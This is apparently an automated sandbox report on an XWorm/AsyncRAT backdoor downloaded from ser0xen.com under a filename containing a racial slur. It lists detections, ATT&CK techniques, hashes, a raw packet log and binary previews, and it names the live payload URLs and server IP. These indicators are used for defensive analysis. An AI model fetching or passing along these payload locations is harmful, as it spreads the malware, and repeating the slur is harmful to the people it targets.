          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000008.00000000.2482762861.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: sucklemydicknigger.exe PID: 2568, type: MEMORYSTR
          Source: Yara matchFile source: dropped/chromecache_49, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\Downloads\Unconfirmed 610443.crdownload, type: DROPPED

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000008.00000000.2482762861.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: sucklemydicknigger.exe PID: 2568, type: MEMORYSTR
          Source: Yara matchFile source: dropped/chromecache_49, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\Downloads\Unconfirmed 610443.crdownload, type: DROPPED
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          PowerShell
          1
          DLL Side-Loading
          11
          Process Injection
          11
          Masquerading
          1
          Input Capture
          11
          Security Software Discovery
          Remote Services1
          Input Capture
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          11
          Disable or Modify Tools
          LSASS Memory1
          Process Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture3
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Software Packing
          Cached Domain Credentials13
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          No Antivirus matches
          SourceDetectionScannerLabelLink
          /opt/package/joesandbox/database/analysis/1527567/temp/droppedscan/chromecache_49100%AviraTR/Spy.Gen
          C:\Users\user\Downloads\Unconfirmed 610443.crdownload100%AviraTR/Spy.Gen
          /opt/package/joesandbox/database/analysis/1527567/temp/droppedscan/chromecache_49100%Joe Sandbox ML
          C:\Users\user\Downloads\Unconfirmed 610443.crdownload100%Joe Sandbox ML
          C:\Users\user\Downloads\Unconfirmed 610443.crdownload96%ReversingLabsByteCode-MSIL.Backdoor.XWorm
          C:\Users\user\Downloads\Unconfirmed 610443.crdownload77%VirustotalBrowse
          C:\Users\user\Downloads\sucklemydicknigger.exe (copy)96%ReversingLabsByteCode-MSIL.Backdoor.XWorm
          C:\Users\user\Downloads\sucklemydicknigger.exe (copy)77%VirustotalBrowse
          Chrome Cache Entry: 4996%ReversingLabsByteCode-MSIL.Backdoor.XWorm
          Chrome Cache Entry: 4977%VirustotalBrowse
          No Antivirus matches
          SourceDetectionScannerLabelLink
          www.google.com0%VirustotalBrowse
          ser0xen.com2%VirustotalBrowse
          s-part-0017.t-0009.t-msedge.net0%VirustotalBrowse
          s-part-0032.t-0009.t-msedge.net0%VirustotalBrowse
          fp2e7a.wpc.phicdn.net0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
          http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
          https://github.com/Pester/Pester1%VirustotalBrowse
          https://ser0xen.com/pl.txt0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          ser0xen.com
          18.224.107.108
          truefalseunknown
          s-part-0017.t-0009.t-msedge.net
          13.107.246.45
          truefalseunknown
          www.google.com
          142.250.184.196
          truefalseunknown
          fp2e7a.wpc.phicdn.net
          192.229.221.95
          truefalseunknown
          s-part-0032.t-0009.t-msedge.net
          13.107.246.60
          truefalseunknown
          NameMaliciousAntivirus DetectionReputation
          http://ser0xen.com/sucklemydicknigger.exefalse
            unknown
            https://ser0xen.com/sucklemydicknigger.exefalse
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.2578733461.000001B191DEF000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2560586026.000001B181FB7000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000A.00000002.2560586026.000001B181FB7000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2560586026.000001B181FB7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000A.00000002.2560586026.000001B181FB7000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/powershell.exe, 0000000A.00000002.2578733461.000001B191DEF000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.2578733461.000001B191DEF000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2578733461.000001B191DEF000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://crl.micpowershell.exe, 0000000A.00000002.2586112870.000001B19A3D0000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2578733461.000001B191DEF000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://aka.ms/pscore68powershell.exe, 0000000A.00000002.2560586026.000001B181D91000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesucklemydicknigger.exe, 00000008.00000002.2595583400.0000000003181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2560586026.000001B181D91000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2560586026.000001B181FB7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://ser0xen.com/pl.txtsucklemydicknigger.exe, 00000008.00000002.2595583400.0000000003181000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                142.250.184.196
                www.google.comUnited States
                15169GOOGLEUSfalse
                239.255.255.250
                unknownReserved
                unknownunknownfalse
                18.224.107.108
                ser0xen.comUnited States
                16509AMAZON-02USfalse
                IP
                192.168.2.4
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1527567
                Start date and time:2024-10-07 03:24:53 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 6s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:browseurl.jbs
                Sample URL:http://ser0xen.com/sucklemydicknigger.exe
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:13
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.evad.win@23/9@6/4
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.181.238, 74.125.71.84, 34.104.35.123, 199.232.214.172, 192.229.221.95, 142.250.185.131, 142.250.185.142
                • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, update.googleapis.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com
                • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                21:27:11API Interceptor19x Sleep call for process: powershell.exe modified
                No context
                No context
                No context
                No context
                No context
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1940658735648508
                Encrypted:false
                SSDEEP:3:Nlllul/nq/llh:NllUyt
                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                Malicious:false
                Reputation:low
                Preview:@...e................................................@..........
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:low
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:low
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:low
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:low
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):39424
                Entropy (8bit):5.602390271817693
                Encrypted:false
                SSDEEP:768:GVKCdLYWWLvKHjy9DTYfAFWP+9MzCM6cOMhVrPY:G7ctLvKHjenF99MzCM6cOMvrY
                MD5:49AA60A3EE7D3B03D16AA591024CBBC7
                SHA1:AB7A4B389A7583370A53792852A819AA34D5D2E8
                SHA-256:E9F7EDCB41000F0375515A01DAE7D155723B8BBBA28C7BAE75C63E7D98FDEDAA
                SHA-512:5DFCA79A35FE60F0CBE141A87EA1FED9AAB1D8726D771E69302733BE0F9E7FAACAFC31CB3F4545A8D2AF971A7E97D8A96D92D1C29CBC0FA8DE4D0BC499674448
                Malicious:true
                Yara Hits:
                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Downloads\Unconfirmed 610443.crdownload, Author: Joe Security
                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Downloads\Unconfirmed 610443.crdownload, Author: ditekSHen
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 96%
                • Antivirus: Virustotal, Detection: 77%, Browse
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.................................P...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........Y..8V............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):39424
                Entropy (8bit):5.602390271817693
                Encrypted:false
                SSDEEP:768:GVKCdLYWWLvKHjy9DTYfAFWP+9MzCM6cOMhVrPY:G7ctLvKHjenF99MzCM6cOMvrY
                MD5:49AA60A3EE7D3B03D16AA591024CBBC7
                SHA1:AB7A4B389A7583370A53792852A819AA34D5D2E8
                SHA-256:E9F7EDCB41000F0375515A01DAE7D155723B8BBBA28C7BAE75C63E7D98FDEDAA
                SHA-512:5DFCA79A35FE60F0CBE141A87EA1FED9AAB1D8726D771E69302733BE0F9E7FAACAFC31CB3F4545A8D2AF971A7E97D8A96D92D1C29CBC0FA8DE4D0BC499674448
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 96%
                • Antivirus: Virustotal, Detection: 77%, Browse
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.................................P...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........Y..8V............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:downloaded
                Size (bytes):39424
                Entropy (8bit):5.602390271817693
                Encrypted:false
                SSDEEP:768:GVKCdLYWWLvKHjy9DTYfAFWP+9MzCM6cOMhVrPY:G7ctLvKHjenF99MzCM6cOMvrY
                MD5:49AA60A3EE7D3B03D16AA591024CBBC7
                SHA1:AB7A4B389A7583370A53792852A819AA34D5D2E8
                SHA-256:E9F7EDCB41000F0375515A01DAE7D155723B8BBBA28C7BAE75C63E7D98FDEDAA
                SHA-512:5DFCA79A35FE60F0CBE141A87EA1FED9AAB1D8726D771E69302733BE0F9E7FAACAFC31CB3F4545A8D2AF971A7E97D8A96D92D1C29CBC0FA8DE4D0BC499674448
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 96%
                • Antivirus: Virustotal, Detection: 77%, Browse
                Reputation:low
                URL:https://ser0xen.com/sucklemydicknigger.exe
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.................................P...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........Y..8V............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                No static file info
                Icon Hash:b29a8a8e86868381
                TimestampSource PortDest PortSource IPDest IP
                Oct 7, 2024 03:25:40.675673008 CEST49675443192.168.2.4173.222.162.32
                Oct 7, 2024 03:25:49.243133068 CEST4973580192.168.2.418.224.107.108
                Oct 7, 2024 03:25:49.243437052 CEST4973680192.168.2.418.224.107.108
                Oct 7, 2024 03:25:49.248075008 CEST804973518.224.107.108192.168.2.4
                Oct 7, 2024 03:25:49.248167038 CEST4973580192.168.2.418.224.107.108
                Oct 7, 2024 03:25:49.248250961 CEST804973618.224.107.108192.168.2.4
                Oct 7, 2024 03:25:49.248305082 CEST4973680192.168.2.418.224.107.108
                Oct 7, 2024 03:25:49.248366117 CEST4973580192.168.2.418.224.107.108
                Oct 7, 2024 03:25:49.253117085 CEST804973518.224.107.108192.168.2.4
                Oct 7, 2024 03:25:49.735582113 CEST804973518.224.107.108192.168.2.4
                Oct 7, 2024 03:25:49.783679962 CEST4973580192.168.2.418.224.107.108
                Oct 7, 2024 03:25:49.785691977 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:49.785722971 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:49.785814047 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:49.785986900 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:49.785998106 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.290539980 CEST49675443192.168.2.4173.222.162.32
                Oct 7, 2024 03:25:50.332598925 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.332959890 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.333003044 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.334671021 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.334778070 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.335690022 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.335783958 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.335835934 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.379430056 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.385305882 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.385344982 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.431581974 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.468291044 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.468358040 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.468379974 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.468396902 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.468460083 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.468516111 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.468552113 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.508656979 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.562483072 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.562505960 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.562601089 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.562624931 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.562707901 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.562829971 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.562850952 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.562900066 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.562902927 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.562902927 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.562956095 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.563832998 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.563853025 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.563896894 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.563939095 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.564723969 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.564743996 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.564795971 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.564815044 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.564950943 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:50.565028906 CEST49737443192.168.2.418.224.107.108
